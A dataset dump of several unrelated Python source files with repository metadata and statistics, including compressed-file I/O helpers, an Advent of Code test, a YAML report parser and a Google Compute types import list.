ff56a098283ca872abfbaae6ba8abba479ffa394
[ "Apache-2.0" ]
null
null
null
from db.models.artifacts_stores import ArtifactsStore def register(admin_register): admin_register(ArtifactsStore)
20.166667
53
0.834711
14
121
7
0.714286
0.265306
0.428571
0
0
0
0
0
0
0
0
0
0.107438
121
5
54
24.2
0.907407
0
0
0
0
0
0
0
0
0
0
0
0
1
0.333333
false
0
0.333333
0
0.666667
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
0
1
0
0
7
0441d31e81610fd06a88d92c4fecfafccc282029
232
py
Python
Server/Python/src/dbs/dao/MySQL/DatasetParent/ListChild.py
vkuznet/DBS
14df8bbe8ee8f874fe423399b18afef911fe78c7
[ "Apache-2.0" ]
8
2015-08-14T04:01:32.000Z
2021-06-03T00:56:42.000Z
Server/Python/src/dbs/dao/MySQL/DatasetParent/ListChild.py
yuyiguo/DBS
14df8bbe8ee8f874fe423399b18afef911fe78c7
[ "Apache-2.0" ]
162
2015-01-07T21:34:47.000Z
2021-10-13T09:42:41.000Z
Server/Python/src/dbs/dao/MySQL/DatasetParent/ListChild.py
yuyiguo/DBS
14df8bbe8ee8f874fe423399b18afef911fe78c7
[ "Apache-2.0" ]
16
2015-01-22T15:27:29.000Z
2021-04-28T09:23:28.000Z
#!/usr/bin/env python """ This module provides DatasetParent.ListChild data access object. """ from dbs.dao.Oracle.DatasetParent.ListChild import ListChild as OraDatasetChildList class ListChild(OraDatasetChildList): pass
23.2
83
0.784483
26
232
7
0.807692
0.241758
0
0
0
0
0
0
0
0
0
0
0.12931
232
9
84
25.777778
0.90099
0.366379
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0.333333
0.333333
0
0.666667
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
1
0
1
0
0
7
f08963d9d48a9ec743b4386dd0a1ecbe043e4101
69
py
Python
sunpy/net/jsoc/__init__.py
RhnSharma/sunpy
03700193d287156ca1922eb27c4c2ad50040e53f
[ "BSD-2-Clause" ]
628
2015-01-14T17:34:10.000Z
2022-03-29T06:07:50.000Z
sunpy/net/jsoc/__init__.py
RhnSharma/sunpy
03700193d287156ca1922eb27c4c2ad50040e53f
[ "BSD-2-Clause" ]
3,983
2015-01-03T11:16:21.000Z
2022-03-31T16:55:38.000Z
sunpy/net/jsoc/__init__.py
RhnSharma/sunpy
03700193d287156ca1922eb27c4c2ad50040e53f
[ "BSD-2-Clause" ]
582
2015-01-14T10:09:24.000Z
2022-03-29T06:07:12.000Z
from sunpy.net.jsoc.attrs import * from sunpy.net.jsoc.jsoc import *
23
34
0.768116
12
69
4.416667
0.5
0.339623
0.45283
0.603774
0
0
0
0
0
0
0
0
0.115942
69
2
35
34.5
0.868852
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
8
f08b63d03566f117666137e2053218f971e8aa81
10,004
py
Python
src/jk_utils/file_rw.py
jkpubsrc/python-module-jk-utils
6bf97b3dcde7a970c20ca43323e2eb0dda8fbfb3
[ "Apache-1.1" ]
null
null
null
src/jk_utils/file_rw.py
jkpubsrc/python-module-jk-utils
6bf97b3dcde7a970c20ca43323e2eb0dda8fbfb3
[ "Apache-1.1" ]
null
null
null
src/jk_utils/file_rw.py
jkpubsrc/python-module-jk-utils
6bf97b3dcde7a970c20ca43323e2eb0dda8fbfb3
[ "Apache-1.1" ]
null
null
null
import os import gzip import bz2 import lzma import json class openReadBinary(object): def __init__(self, filePath): self.__filePath = filePath if filePath.endswith(".gz") or filePath.endswith(".gzip"): self.__open = gzip.open elif filePath.endswith(".bz2") or filePath.endswith(".bzip2"): self.__open = bz2.open elif filePath.endswith(".lzma") or filePath.endswith(".xz"): self.__open = lzma.open else: self.__open = open # def __enter__(self): self.__f = self.__open(self.__filePath, "rb") return self.__f # def __exit__(self, *args): self.__f.close() # # class openReadText(object): class _BinaryWrapper(object): def __init__(self, f): self.__f = f # def read(self, length = None): data = self.__f.read() return data.decode("utf-8") # def close(self): self.__f.close() # # def __init__(self, filePath): self.__filePath = filePath if filePath.endswith(".gz") or filePath.endswith(".gzip"): self.__open = gzip.open self.__bToText = True elif filePath.endswith(".bz2") or filePath.endswith(".bzip2"): self.__open = bz2.open self.__bToText = True elif filePath.endswith(".lzma") or filePath.endswith(".xz"): self.__open = lzma.open self.__bToText = True else: self.__open = open self.__bToText = False # def __enter__(self): if self.__bToText: self.__f = openReadText._BinaryWrapper(self.__open(self.__filePath, "rb")) else: self.__f = self.__open(self.__filePath, "r") return self.__f # def __exit__(self, *args): self.__f.close() # # class openReadJSON(object): class _BinaryWrapper(object): def __init__(self, f): self.__f = f # def read(self, length = None): data = self.__f.read() return data.decode("utf-8") # def close(self): self.__f.close() # # class _JSONWrapper(object): def __init__(self, f): self.__f = f # def read(self): data = self.__f.read() return json.loads(data) # def close(self): self.__f.close() # # def __init__(self, filePath): self.__filePath = filePath if filePath.endswith(".gz") or filePath.endswith(".gzip"): self.__open = gzip.open self.__bToText = True elif filePath.endswith(".bz2") or filePath.endswith(".bzip2"): self.__open = bz2.open self.__bToText = True elif filePath.endswith(".lzma") or filePath.endswith(".xz"): self.__open = lzma.open self.__bToText = True else: self.__open = open self.__bToText = False # def __enter__(self): if self.__bToText: self.__f = openReadJSON._JSONWrapper(openReadJSON._BinaryWrapper(self.__open(self.__filePath, "rb"))) else: self.__f = openReadJSON._JSONWrapper(self.__open(self.__filePath, "r")) return self.__f # def __exit__(self, *args): self.__f.close() # # class openWriteBinary(object): def __init__(self, filePath, bSafeWrite:bool = True, compression:str = None): self.__filePath = filePath self.__bSafeWrite = bSafeWrite if self.__bSafeWrite: self.__filePathTmp = filePath + ".tmp" self.__format = None if compression: if (compression == "gzip") or (compression == "gz"): self.__open = gzip.open elif (compression == "bz2") or (compression == "bzip2"): self.__open = bz2.open elif compression == "lzma": self.__format = lzma.FORMAT_ALONE self.__open = lzma.open elif compression == "xz": self.__format = lzma.FORMAT_XZ self.__open = lzma.open else: raise Exception("Unknown compressor: " + compression) else: self.__open = open # def __enter__(self): if self.__bSafeWrite: if self.__format: self.__f = self.__open(self.__filePathTmp, "wb", format=self.__format) else: self.__f = self.__open(self.__filePathTmp, "wb") else: if self.__format: self.__f = self.__open(self.__filePath, "wb", format=self.__format) else: self.__f = self.__open(self.__filePath, "wb") return self.__f # def __exit__(self, *args): self.__f.close() if self.__bSafeWrite: if os.path.isfile(self.__filePath): os.unlink(self.__filePath) os.rename(self.__filePathTmp, self.__filePath) # # class openWriteText(object): # # Write text data to an underlying binary stream # class _BinaryWrapper(object): def __init__(self, f): self.__f = f # def write(self, textData): self.__f.write(textData.encode("utf-8")) # def close(self): self.__f.close() # # def __init__(self, filePath, bSafeWrite:bool = True, compression:str = None): self.__filePath = filePath self.__bSafeWrite = bSafeWrite if self.__bSafeWrite: self.__filePathTmp = filePath + ".tmp" self.__bToBinary = False self.__format = None if compression: if (compression == "gzip") or (compression == "gz"): self.__open = gzip.open self.__bToBinary = True elif (compression == "bz2") or (compression == "bzip2"): self.__open = bz2.open self.__bToBinary = True elif compression == "lzma": self.__format = lzma.FORMAT_ALONE self.__open = lzma.open self.__bToBinary = True elif compression == "xz": self.__format = lzma.FORMAT_XZ self.__open = lzma.open self.__bToBinary = True else: raise Exception("Unknown compressor: " + compression) else: self.__open = open # def __enter__(self): if self.__bSafeWrite: if self.__bToBinary: if self.__format: self.__f = openWriteText._BinaryWrapper(self.__open(self.__filePathTmp, "wb", format=self.__format)) else: self.__f = openWriteText._BinaryWrapper(self.__open(self.__filePathTmp, "wb")) else: if self.__format: self.__f = self.__open(self.__filePathTmp, "w", format=self.__format) else: self.__f = self.__open(self.__filePathTmp, "w") else: if self.__bToBinary: if self.__format: self.__f = openWriteText._BinaryWrapper(self.__open(self.__filePath, "wb", format=self.__format)) else: self.__f = openWriteText._BinaryWrapper(self.__open(self.__filePath, "wb")) else: if self.__format: self.__f = self.__open(self.__filePath, "w", format=self.__format) else: self.__f = self.__open(self.__filePath, "w") return self.__f # def __exit__(self, *args): self.__f.close() if self.__bSafeWrite: if os.path.isfile(self.__filePath): os.unlink(self.__filePath) os.rename(self.__filePathTmp, self.__filePath) # # class openWriteJSON(object): # # Write JSON data to an underlying text stream # class _JSONWrapper(object): def __init__(self, f, bPretty:bool): self.__f = f self.__bPretty = bPretty # def write(self, objData): assert isinstance(objData, (bool, int, float, str, tuple, list, dict, None)) if self.__bPretty: self.__f.write(json.dumps(objData, indent="\t", sort_keys=True)) else: self.__f.write(json.dumps(objData)) # def close(self): self.__f.close() # # class _BinaryWrapper(object): def __init__(self, f): self.__f = f # def write(self, textData): self.__f.write(textData.encode("utf-8")) # def close(self): self.__f.close() # # def __init__(self, filePath, bSafeWrite:bool = True, compression:str = None, bPretty:bool = False): self.__filePath = filePath self.__bSafeWrite = bSafeWrite if self.__bSafeWrite: self.__filePathTmp = filePath + ".tmp" self.__bToBinary = False self.__bPretty = bPretty self.__format = None if compression: if (compression == "gzip") or (compression == "gz"): self.__open = gzip.open self.__bToBinary = True elif (compression == "bz2") or (compression == "bzip2"): self.__open = bz2.open self.__bToBinary = True elif compression == "lzma": self.__format = lzma.FORMAT_ALONE self.__open = lzma.open self.__bToBinary = True elif compression == "xz": self.__format = lzma.FORMAT_XZ self.__open = lzma.open self.__bToBinary = True else: raise Exception("Unknown compressor: " + compression) else: self.__open = open # def __enter__(self): if self.__bSafeWrite: if self.__bToBinary: if self.__format: self.__f = openWriteJSON._BinaryWrapper(self.__open(self.__filePathTmp, "wb", format=self.__format)) else: self.__f = openWriteJSON._BinaryWrapper(self.__open(self.__filePathTmp, "wb")) else: if self.__format: self.__f = self.__open(self.__filePathTmp, "w", format=self.__format) else: self.__f = self.__open(self.__filePathTmp, "w") else: if self.__bToBinary: if self.__format: self.__f = openWriteJSON._BinaryWrapper(self.__open(self.__filePath, "wb", format=self.__format)) else: self.__f = openWriteJSON._BinaryWrapper(self.__open(self.__filePath, "wb")) else: if self.__format: self.__f = self.__open(self.__filePath, "w", format=self.__format) else: self.__f = self.__open(self.__filePath, "w") self.__f = openWriteJSON._JSONWrapper(self.__f, self.__bPretty) return self.__f # def __exit__(self, *args): self.__f.close() if self.__bSafeWrite: if os.path.isfile(self.__filePath): os.unlink(self.__filePath) os.rename(self.__filePathTmp, self.__filePath) # # def writePrivateBinaryFile(binaryData, filePath:str): assert isinstance(filePath, str) assert isinstance(binaryData, (bytes, bytearray)) try: os.remove(filePath) except OSError: pass umask_original = os.umask(0) try: fdesc = os.open(filePath, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600) finally: os.umask(umask_original) with os.fdopen(fdesc, "wb") as fout: fout.write(binaryData) # def writePrivateJSONFile(jsonData, filePath:str, bPretty:bool = False): assert isinstance(filePath, str) assert isinstance(jsonData, (int, float, bool, str, list, tuple, dict)) if bPretty: s = json.dumps(jsonData, indent="\t", sort_keys=True) else: s = json.dumps(jsonData) writePrivateBinaryFile(s.encode("utf-8"), filePath) # def loadBinaryFile(filePath:str): assert isinstance(filePath, str) with open(filePath, "rb") as fin: return fin.read() #
21.986813
105
0.676529
1,254
10,004
4.936204
0.094099
0.051696
0.048465
0.048465
0.843296
0.837964
0.796284
0.779806
0.779806
0.763813
0
0.003565
0.186925
10,004
454
106
22.035242
0.757438
0.009096
0
0.80602
0
0
0.028743
0
0
0
0
0
0.020067
1
0.130435
false
0.003344
0.016722
0
0.220736
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
f0cf30a073f7b7cd3e5180d7586c746e027ea07c
2,695
py
Python
advent/day01/day01_test.py
benjackwhite/adventofcode2017
ce29e625cbe11fd5f36cff6b36a879c6a3955581
[ "MIT" ]
null
null
null
advent/day01/day01_test.py
benjackwhite/adventofcode2017
ce29e625cbe11fd5f36cff6b36a879c6a3955581
[ "MIT" ]
null
null
null
advent/day01/day01_test.py
benjackwhite/adventofcode2017
ce29e625cbe11fd5f36cff6b36a879c6a3955581
[ "MIT" ]
null
null
null
from day01 import reverse_captcha, reverse_captcha_two target = "237369991482346124663395286354672985457326865748533412179778188397835279584149971999798512279429268727171755461418974558538246429986747532417846157526523238931351898548279549456694488433438982744782258279173323381571985454236569393975735715331438256795579514159946537868358735936832487422938678194757687698143224139243151222475131337135843793611742383267186158665726927967655583875485515512626142935357421852953775733748941926983377725386196187486131337458574829848723711355929684625223564489485597564768317432893836629255273452776232319265422533449549956244791565573727762687439221862632722277129613329167189874939414298584616496839223239197277563641853746193232543222813298195169345186499866147586559781523834595683496151581546829112745533347796213673814995849156321674379644323159259131925444961296821167483628812395391533572555624159939279125341335147234653572977345582135728994395631685618135563662689854691976843435785879952751266627645653981281891643823717528757341136747881518611439246877373935758151119185587921332175189332436522732144278613486716525897262879287772969529445511736924962777262394961547579248731343245241963914775991292177151554446695134653596633433171866618541957233463548142173235821168156636824233487983766612338498874251672993917446366865832618475491341253973267556113323245113845148121546526396995991171739837147479978645166417988918289287844384513974369397974378819848552153961651881528134624869454563488858625261356763562723261767873542683796675797124322382732437235544965647934514871672522777378931524994784845817584793564974285139867972185887185987353468488155283698464226415951583138352839943621294117262483559867661596299753986347244786339543174594266422815794658477629829383461829261994591318851587963554829459353892825847978971823347219468516784857348649693185172199398234123745415271222891161175788713733444497592853221743138324235934216658323717267715318744537689459113188549896737581637879552568829548365738314593851221113932919767844137362623398623853789938824592" def test_reverse_captcha_should_return_sum_of_consequent_numbers(): assert reverse_captcha("1122") == 3 assert reverse_captcha("1111") == 4 assert reverse_captcha("1234") == 0 assert reverse_captcha("91212129") == 9 assert reverse_captcha(target) == 995 def test_reverse_captcha_two_should_return_sum_of_circular_match(): assert reverse_captcha_two("1212") == 6 assert reverse_captcha_two("1221") == 0 assert reverse_captcha_two("123425") == 4 assert reverse_captcha_two("123123") == 12 assert reverse_captcha_two("12131415") == 4 assert reverse_captcha_two(target) == 1130
122.5
2,015
0.933952
92
2,695
26.956522
0.391304
0.084677
0.08871
0.055645
0.019355
0
0
0
0
0
0
0.799923
0.039332
2,695
21
2,016
128.333333
0.157976
0
0
0
0
0
0.76141
0.743599
0
1
0
0
0.733333
1
0.133333
false
0
0.066667
0
0.2
0
0
0
1
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
1
1
1
0
0
0
0
0
1
1
null
1
0
0
1
0
0
0
0
0
0
0
0
0
9
f0ef7b155bb4b950ff9c1906c9eb7678e8d0cc82
1,708
py
Python
lib/data_handling/errors.py
mpmuc84/helper-scripts
573353827d94f65efe763a93770ba75bcda90fff
[ "BSD-2-Clause" ]
4
2018-10-11T09:48:39.000Z
2019-11-12T06:17:17.000Z
lib/data_handling/errors.py
mpmuc84/helper-scripts
573353827d94f65efe763a93770ba75bcda90fff
[ "BSD-2-Clause" ]
26
2017-11-10T15:46:03.000Z
2021-08-13T12:02:27.000Z
lib/data_handling/errors.py
mpmuc84/helper-scripts
573353827d94f65efe763a93770ba75bcda90fff
[ "BSD-2-Clause" ]
21
2017-10-12T11:47:37.000Z
2021-05-05T13:07:59.000Z
import logging class SeriesError(Exception): """ Represents all errors that can hinder the recovery of a series. Simply contains an error message and nothing else. """ pass class MediaPackageError(Exception): """ Represents all errors that can hinder the recovery of a media package. Simply contains an error message and nothing else. """ pass def optional_series_error(error, ignore_errors, exception=None): """ Print a warning if errors should be ignored, otherwise raise a SeriesError :param error: The message that should be printed as a warning or raised as an error :type error: str :param ignore_errors: Whether to raise an error or print a warning :type ignore_errors: bool :param exception: The exception that caused the error :type exception: Exception :raise SeriesError: """ if ignore_errors: print("Warning: {}".format(error)) logging.error(error, exc_info=True) else: raise SeriesError(error) from exception def optional_mp_error(error, ignore_errors, exception=None): """ Print a warning if errors should be ignored, otherwise raise a MediaPackageError :param error: The message that should be printed as a warning or raised as an error :type error: str :param ignore_errors: Whether to raise an error or print a warning :type ignore_errors: bool :param exception: The exception that caused the error :type exception: Exception :raise MediaPackageError: """ if ignore_errors: print("Warning: {}".format(error)) logging.error(error, exc_info=True) else: raise MediaPackageError(error) from exception
30.5
87
0.701991
225
1,708
5.266667
0.253333
0.081013
0.043882
0.047257
0.81519
0.81519
0.81519
0.81519
0.81519
0.737553
0
0
0.231265
1,708
55
88
31.054545
0.902513
0.579625
0
0.588235
0
0
0.037099
0
0
0
0
0
0
1
0.117647
false
0.117647
0.058824
0
0.294118
0.117647
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
7
0b1bb3284c89b249c3518aaa7325d895f6ee8edd
6,647
py
Python
report_parser/report_parser.py
joshwilding4444/testing
c687b61a2c423c4c7a60f9cdd9fc63e7499d7424
[ "BSD-3-Clause" ]
null
null
null
report_parser/report_parser.py
joshwilding4444/testing
c687b61a2c423c4c7a60f9cdd9fc63e7499d7424
[ "BSD-3-Clause" ]
null
null
null
report_parser/report_parser.py
joshwilding4444/testing
c687b61a2c423c4c7a60f9cdd9fc63e7499d7424
[ "BSD-3-Clause" ]
null
null
null
#!/usr/bin/python3 """Parses a report into YAML.""" import sys import yaml import parse_dmidecode import parse_operating_system import parse_cpu import parse_memory import parse_storage import parse_dm_multipath import parse_lspci import parse_ethtool def test_dmidecode(input_filename): """Parses up to the DMIDECODE section.""" test_dmi = parse_dmidecode.read_dmidecode(open(input_filename)) yaml.dump(test_dmi, open('output.yaml', 'w')) def test_read_operating_system(input_filename): """Parses up to the OS section.""" target_file = open(input_filename) test_dmi = parse_dmidecode.read_dmidecode(target_file) test_os = parse_operating_system.read_operating_system(target_file) target_output = open('output.yaml', 'w') yaml.dump(test_dmi, target_output) yaml.dump(test_os, target_output) def test_read_cpu_stats(input_filename): """Parses up to the CPU section.""" target_file = open(input_filename) test_dmi = parse_dmidecode.read_dmidecode(target_file) test_os = parse_operating_system.read_operating_system(target_file) test_cpu_stats = parse_cpu.read_cpu_stats(target_file) target_output = open('output.yaml', 'w') yaml.dump(test_dmi, target_output) yaml.dump(test_os, target_output) yaml.dump(test_cpu_stats, target_output) def test_read_memory_stats(input_filename): """Parses up to the MEMORY section.""" target_file = open(input_filename) test_dmi = parse_dmidecode.read_dmidecode(target_file) test_os = parse_operating_system.read_operating_system(target_file) test_cpu_stats = parse_cpu.read_cpu_stats(target_file) test_memory_stats = parse_memory.read_memory_stats(target_file) target_output = open('output.yaml', 'w') yaml.dump(test_dmi, target_output) yaml.dump(test_os, target_output) yaml.dump(test_cpu_stats, target_output) yaml.dump(test_memory_stats, target_output) def test_read_storage_stats(input_filename): """Parses up to the STORAGE section.""" target_file = open(input_filename) test_dmi = parse_dmidecode.read_dmidecode(target_file) test_os = parse_operating_system.read_operating_system(target_file) test_cpu_stats = parse_cpu.read_cpu_stats(target_file) test_memory_stats = parse_memory.read_memory_stats(target_file) test_storage_stats = parse_storage.read_storage_stats(target_file) target_output = open('output.yaml', 'w') yaml.dump(test_dmi, target_output) yaml.dump(test_os, target_output) yaml.dump(test_cpu_stats, target_output) yaml.dump(test_memory_stats, target_output) yaml.dump(test_storage_stats, target_output) def test_read_dm_multipath(input_filename): """Parses up to the DMI-MULTIPATH section.""" target_file = open(input_filename) test_dmi = parse_dmidecode.read_dmidecode(target_file) test_os = parse_operating_system.read_operating_system(target_file) test_cpu_stats = parse_cpu.read_cpu_stats(target_file) test_memory_stats = parse_memory.read_memory_stats(target_file) test_storage_stats = parse_storage.read_storage_stats(target_file) test_dm_multipath = parse_dm_multipath.parse_dm_multipath(target_file) target_output = open('output.yaml', 'w') yaml.dump(test_dmi, target_output) yaml.dump(test_os, target_output) yaml.dump(test_cpu_stats, target_output) yaml.dump(test_memory_stats, target_output) yaml.dump(test_storage_stats, target_output) yaml.dump(test_dm_multipath, target_output) def test_read_lspci(input_filename): """Parses up to the LSPCI section.""" target_file = open(input_filename) test_dmi = parse_dmidecode.read_dmidecode(target_file) test_os = parse_operating_system.read_operating_system(target_file) test_cpu_stats = parse_cpu.read_cpu_stats(target_file) test_memory_stats = parse_memory.read_memory_stats(target_file) test_storage_stats = parse_storage.read_storage_stats(target_file) test_dm_multipath = parse_dm_multipath.parse_dm_multipath(target_file) test_lspci = parse_lspci.read_lspci(target_file) target_output = open('output.yaml', 'w') yaml.dump(test_dmi, target_output) yaml.dump(test_os, target_output) yaml.dump(test_cpu_stats, target_output) yaml.dump(test_memory_stats, target_output) yaml.dump(test_storage_stats, target_output) yaml.dump(test_dm_multipath, target_output) yaml.dump(test_lspci, target_output) def test_read_ethtool(input_filename): """Parses up to the ETHTOOL section.""" target_file = open(input_filename) test_dmi = parse_dmidecode.read_dmidecode(target_file) test_os = parse_operating_system.read_operating_system(target_file) test_cpu_stats = parse_cpu.read_cpu_stats(target_file) test_memory_stats = parse_memory.read_memory_stats(target_file) test_storage_stats = parse_storage.read_storage_stats(target_file) test_dm_multipath = parse_dm_multipath.parse_dm_multipath(target_file) test_lspci = parse_lspci.read_lspci(target_file) test_ethtool = parse_ethtool.read_ethtool(target_file) target_output = open('output.yaml', 'w') yaml.dump(test_dmi, target_output) yaml.dump(test_os, target_output) yaml.dump(test_cpu_stats, target_output) yaml.dump(test_memory_stats, target_output) yaml.dump(test_storage_stats, target_output) yaml.dump(test_dm_multipath, target_output) yaml.dump(test_lspci, target_output) yaml.dump(test_ethtool, target_output) def read_entire_file(input_filename, output_filename): """Parses the entire report.""" target_file = open(input_filename) test_dmi = parse_dmidecode.read_dmidecode(target_file) test_os = parse_operating_system.read_operating_system(target_file) test_cpu_stats = parse_cpu.read_cpu_stats(target_file) test_memory_stats = parse_memory.read_memory_stats(target_file) test_storage_stats = parse_storage.read_storage_stats(target_file) test_dm_multipath = parse_dm_multipath.parse_dm_multipath(target_file) test_lspci = parse_lspci.read_lspci(target_file) test_ethtool = parse_ethtool.read_ethtool(target_file) target_output = open(output_filename, 'w') yaml.dump(test_dmi, target_output) yaml.dump(test_os, target_output) yaml.dump(test_cpu_stats, target_output) yaml.dump(test_memory_stats, target_output) yaml.dump(test_storage_stats, target_output) yaml.dump(test_dm_multipath, target_output) yaml.dump(test_lspci, target_output) yaml.dump(test_ethtool, target_output) def main(): """Calls the function to read the entire report.""" read_entire_file(sys.argv[1], sys.argv[2]) if __name__ == "__main__": main()
44.019868
74
0.781706
967
6,647
4.932782
0.049638
0.106918
0.110692
0.146751
0.885744
0.878826
0.837526
0.818029
0.818029
0.818029
0
0.000519
0.130284
6,647
150
75
44.313333
0.824598
0.05777
0
0.795276
0
0
0.016916
0
0
0
0
0
0
1
0.07874
false
0
0.07874
0
0.15748
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
6816dff8fb5c2e30c5ee4ed2e4af5d579dff6773
79,398
py
Python
google/cloud/compute_v1/types/__init__.py
georgiyekkert/python-compute
d128efbb3bf10af9b41e55b20aaa8080b3221e77
[ "Apache-2.0" ]
null
null
null
google/cloud/compute_v1/types/__init__.py
georgiyekkert/python-compute
d128efbb3bf10af9b41e55b20aaa8080b3221e77
[ "Apache-2.0" ]
null
null
null
google/cloud/compute_v1/types/__init__.py
georgiyekkert/python-compute
d128efbb3bf10af9b41e55b20aaa8080b3221e77
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- # Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from .compute import ( AbandonInstancesInstanceGroupManagerRequest, AbandonInstancesRegionInstanceGroupManagerRequest, AcceleratorConfig, Accelerators, AcceleratorType, AcceleratorTypeAggregatedList, AcceleratorTypeList, AcceleratorTypesScopedList, AccessConfig, AddAccessConfigInstanceRequest, AddAssociationFirewallPolicyRequest, AddHealthCheckTargetPoolRequest, AddInstancesInstanceGroupRequest, AddInstanceTargetPoolRequest, AddNodesNodeGroupRequest, AddPeeringNetworkRequest, AddResourcePoliciesDiskRequest, AddResourcePoliciesInstanceRequest, AddResourcePoliciesRegionDiskRequest, Address, AddressAggregatedList, AddressesScopedList, AddressList, AddRuleFirewallPolicyRequest, AddRuleSecurityPolicyRequest, AddSignedUrlKeyBackendBucketRequest, AddSignedUrlKeyBackendServiceRequest, AdvancedMachineFeatures, AggregatedListAcceleratorTypesRequest, AggregatedListAddressesRequest, AggregatedListAutoscalersRequest, AggregatedListBackendServicesRequest, AggregatedListDisksRequest, AggregatedListDiskTypesRequest, AggregatedListForwardingRulesRequest, AggregatedListGlobalOperationsRequest, AggregatedListHealthChecksRequest, AggregatedListInstanceGroupManagersRequest, AggregatedListInstanceGroupsRequest, AggregatedListInstancesRequest, AggregatedListInterconnectAttachmentsRequest, AggregatedListMachineTypesRequest, AggregatedListNetworkEndpointGroupsRequest, AggregatedListNodeGroupsRequest, AggregatedListNodeTemplatesRequest, AggregatedListNodeTypesRequest, AggregatedListPacketMirroringsRequest, AggregatedListPublicDelegatedPrefixesRequest, AggregatedListRegionCommitmentsRequest, AggregatedListReservationsRequest, AggregatedListResourcePoliciesRequest, AggregatedListRoutersRequest, AggregatedListServiceAttachmentsRequest, AggregatedListSslCertificatesRequest, AggregatedListSubnetworksRequest, AggregatedListTargetHttpProxiesRequest, AggregatedListTargetHttpsProxiesRequest, AggregatedListTargetInstancesRequest, AggregatedListTargetPoolsRequest, AggregatedListTargetVpnGatewaysRequest, AggregatedListUrlMapsRequest, AggregatedListVpnGatewaysRequest, AggregatedListVpnTunnelsRequest, AliasIpRange, AllocationSpecificSKUAllocationAllocatedInstancePropertiesReservedDisk, AllocationSpecificSKUAllocationReservedInstanceProperties, AllocationSpecificSKUReservation, Allowed, ApplyUpdatesToInstancesInstanceGroupManagerRequest, ApplyUpdatesToInstancesRegionInstanceGroupManagerRequest, AttachDiskInstanceRequest, AttachedDisk, AttachedDiskInitializeParams, AttachNetworkEndpointsGlobalNetworkEndpointGroupRequest, AttachNetworkEndpointsNetworkEndpointGroupRequest, AuditConfig, AuditLogConfig, AuthorizationLoggingOptions, Autoscaler, AutoscalerAggregatedList, AutoscalerList, AutoscalersScopedList, AutoscalerStatusDetails, AutoscalingPolicy, AutoscalingPolicyCpuUtilization, AutoscalingPolicyCustomMetricUtilization, AutoscalingPolicyLoadBalancingUtilization, AutoscalingPolicyScaleInControl, AutoscalingPolicyScalingSchedule, Backend, BackendBucket, BackendBucketCdnPolicy, BackendBucketCdnPolicyBypassCacheOnRequestHeader, BackendBucketCdnPolicyNegativeCachingPolicy, BackendBucketList, BackendService, BackendServiceAggregatedList, BackendServiceCdnPolicy, BackendServiceCdnPolicyBypassCacheOnRequestHeader, BackendServiceCdnPolicyNegativeCachingPolicy, BackendServiceFailoverPolicy, BackendServiceGroupHealth, BackendServiceIAP, BackendServiceList, BackendServiceLogConfig, BackendServiceReference, BackendServicesScopedList, Binding, BulkInsertInstanceRequest, BulkInsertInstanceResource, BulkInsertInstanceResourcePerInstanceProperties, BulkInsertRegionInstanceRequest, CacheInvalidationRule, CacheKeyPolicy, CircuitBreakers, CloneRulesFirewallPolicyRequest, Commitment, CommitmentAggregatedList, CommitmentList, CommitmentsScopedList, Condition, ConfidentialInstanceConfig, ConnectionDraining, ConsistentHashLoadBalancerSettings, ConsistentHashLoadBalancerSettingsHttpCookie, CorsPolicy, CreateInstancesInstanceGroupManagerRequest, CreateInstancesRegionInstanceGroupManagerRequest, CreateSnapshotDiskRequest, CreateSnapshotRegionDiskRequest, CustomerEncryptionKey, CustomerEncryptionKeyProtectedDisk, Data, DeleteAccessConfigInstanceRequest, DeleteAddressRequest, DeleteAutoscalerRequest, DeleteBackendBucketRequest, DeleteBackendServiceRequest, DeleteDiskRequest, DeleteExternalVpnGatewayRequest, DeleteFirewallPolicyRequest, DeleteFirewallRequest, DeleteForwardingRuleRequest, DeleteGlobalAddressRequest, DeleteGlobalForwardingRuleRequest, DeleteGlobalNetworkEndpointGroupRequest, DeleteGlobalOperationRequest, DeleteGlobalOperationResponse, DeleteGlobalOrganizationOperationRequest, DeleteGlobalOrganizationOperationResponse, DeleteGlobalPublicDelegatedPrefixeRequest, DeleteHealthCheckRequest, DeleteImageRequest, DeleteInstanceGroupManagerRequest, DeleteInstanceGroupRequest, DeleteInstanceRequest, DeleteInstancesInstanceGroupManagerRequest, DeleteInstancesRegionInstanceGroupManagerRequest, DeleteInstanceTemplateRequest, DeleteInterconnectAttachmentRequest, DeleteInterconnectRequest, DeleteLicenseRequest, DeleteNetworkEndpointGroupRequest, DeleteNetworkRequest, DeleteNodeGroupRequest, DeleteNodesNodeGroupRequest, DeleteNodeTemplateRequest, DeletePacketMirroringRequest, DeletePerInstanceConfigsInstanceGroupManagerRequest, DeletePerInstanceConfigsRegionInstanceGroupManagerRequest, DeletePublicAdvertisedPrefixeRequest, DeletePublicDelegatedPrefixeRequest, DeleteRegionAutoscalerRequest, DeleteRegionBackendServiceRequest, DeleteRegionDiskRequest, DeleteRegionHealthCheckRequest, DeleteRegionHealthCheckServiceRequest, DeleteRegionInstanceGroupManagerRequest, 